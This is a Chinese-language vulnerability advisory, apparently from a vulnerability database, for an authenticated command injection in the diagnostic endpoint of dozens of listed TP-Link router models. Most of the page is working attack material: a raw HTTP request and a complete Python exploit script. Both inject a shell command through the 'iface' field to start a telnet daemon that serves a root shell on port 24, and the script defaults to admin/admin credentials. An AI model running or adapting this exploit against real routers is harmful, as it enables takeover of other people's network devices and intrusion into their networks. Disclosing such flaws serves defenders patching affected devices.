影响列表
TP-LINK TL-WVR
TP-LINK TL-WVR300 v4
TP-LINK TL-WVR302 v2
TP-LINK TL-WVR450
TP-LINK TL-WVR450L
TP-LINK TL-WVR450G v5
TP-LINK TL-WVR458
TP-LINK TL-WVR458L
TP-LINK TL-WVR458P
TP-LINK TL-WVR900G v3
TP-LINK TL-WVR1200L
TP-LINK TL-WVR900L
TP-LINK TL-WVR1300L
TP-LINK TL-WVR1300G
TP-LINK TL-WVR1750L
TP-LINK TL-WVR2600L
TP-LINK TL-WVR4300L
TP-LINK TL-WAR450
TP-LINK TL-WAR302
TP-LINK TL-WAR2600L
TP-LINK TL-WAR1750L
TP-LINK TL-WAR1300L
TP-LINK TL-WAR1200L
TP-LINK TL-WAR900L
TP-LINK TL-WAR458
TP-LINK TL-WAR450L
TP-LINK TL-ER5510G v2
TP-LINK TL-ER5510G v3
TP-LINK TL-ER5520G v2
TP-LINK TL-ER5520G v3
TP-LINK TL-ER6120G v2
TP-LINK TL-ER6520G v2
TP-LINK TL-ER6520G v3
TP-LINK TL-ER3210G
TP-LINK TL-ER7520G
TP-LINK TL-ER6520G
TP-LINK TL-ER6510G
TP-LINK TL-ER6220G
TP-LINK TL-ER6120G
TP-LINK TL-ER6110G
TP-LINK TL-ER5120G
TP-LINK TL-ER5110G
TP-LINK TL-ER3220G
TP-LINK TL-R479P-AC
TP-LINK TL-R478G+
TP-LINK TL-R478G
TP-LINK TL-R478+
TP-LINK TL-R478
TP-LINK TL-R473GP-AC
TP-LINK TL-R473P-AC
TP-LINK TL-R473G
TP-LINK TL-R473
TP-LINK TL-R4299G
TP-LINK TL-R4239G
TP-LINK TL-R4149G
TP-LINK TL-R488
TP-LINK TL-R483
TP-LINK TL-R483G
TP-LINK TL-R479GP-AC
TP-LINK TL-R479GPE-AC 描述
TP-Link TL-WVR等都是中国普联(TP-LINK)公司的无线路由器产品。
多款TP-Link产品中存在命令注入漏洞。远程攻击者可通过向cgi-bin/luci发送face字段中带有shell元字符的admin/diagnostic命令利用该漏洞执行任意命令。利用详情
POST /cgi-bin/luci/;stok=ea2178b4514da7ae227f4ec192536930/admin/diagnostic?form=diag HTTP/1.1
Host: 192.168.3.1
Content-Length: 370
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.3.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.3.1/webpages/index.html
Accept-Encoding: gzip, deflate
Cookie: sysauth=be9b6f2b4b9a76a8a658e108c6197f2c
Connection: close
data=%7B%22method%22%3A%22start%22%2C%22params%22%3A%7B%22type%22%3A%220%22%2C%22type_hidden%22%3A%220%22%2C%22ipaddr_ping%22%3A%22baidu.com%22%2C%22iface_ping%22%3A%22WAN1%22%2C%22ipaddr%22%3A%22baidu.com%22%2C%22iface%22%3A%22%3Btelnetd+-p+24+-l+/bin/sh%22%2C%22count%22%3A%221%22%2C%22pktsize%22%3A%2264%22%2C%22my_result%22%3A%22The+Router+is+ready.%5Cr%5Cn%22%7D%7D漏洞脚本
exp.py
# Tested product: TL-WVR450L
# Hardware version:V1.0
# Firmware version: 20161125
# The RSA_Encryption_For_Tplink.js is use for Rsa Encryption to the password when login the web manager.
# You can download the RSA_Encryption_For_Tplink.js by https://github.com/coincoin7/Wireless-Router-Vulnerability/blob/master/RSA_Encryption_For_Tplink.js
import execjs
import requests
import json
import urllib
def read_js():
file = open("./RSA_Encryption_For_Tplink.js", 'r')
line = file.readline()
js = ''
while line:
js = js + line
line = file.readline()
file.close()
return js
def execute(ip, port, username, passwd, cmd):
try:
s = requests.session()
uri = "http://{}:{}".format(ip,port)
headers = {
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'http://{}/webpages/login.html'.format(ip)
}
payload = {
"method":"get"
}
ret = s.post(uri + '/cgi-bin/luci/;stok=/login?form=login', data=urllib.urlencode({"data":json.dumps(payload)}), headers=headers, timeout=5)
rsa_public_n = json.loads(ret.text)['result']['password'][0].encode("utf-8")
rsa_public_e = json.loads(ret.text)['result']['password'][1].encode("utf-8")
js = read_js()
js_handle = execjs.compile(js)
password = js_handle.call('MainEncrypt', rsa_public_n, rsa_public_e, passwd)
payload = {
"method":"login",
"params":{
"username":"{}".format(username),
"password":"{}".format(password)
}
}
ret = s.post(uri + '/cgi-bin/luci/;stok=/login?form=login', data=urllib.urlencode({"data":json.dumps(payload)}), headers=headers, timeout=5)
stok = json.loads(ret.text)['result']['stok'].encode('utf-8')
cookie = ret.headers['Set-Cookie']
print '[+] Login success'
print '[+] Get The Token: ' + stok
print '[+] Get The Cookie: ' + cookie
headers = {
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Referer':'http://{}/webpages/login.html'.format(ip),
'Cookie':'{}'.format(cookie)
}
payload = {
"method":"start",
"params":{
"type":"0",
"type_hidden":"0",
"ipaddr_ping":"127.0.0.1",
"iface_ping":"WAN1",
"ipaddr":"127.0.0.1",
"iface":";{}".format(cmd),
"count":"1",
"pktsize":"64",
"my_result":"exploit"
}
}
ret = s.post(uri + '/cgi-bin/luci/;stok={}/admin/diagnostic?form=diag'.format(stok), data=urllib.urlencode({"data":json.dumps(payload)}), headers=headers, timeout=5)
#print ret.text
print '[+] Finish RCE'
print '--------------------------------------------------------------'
return True
except:
return False
if __name__=='__main__':
print '-----------Tplink LUCI diagnostic Authenticated RCE-----------'
print execute('192.168.1.1', 80, 'admin', 'admin', 'telnetd -p 24 -l /bin/sh')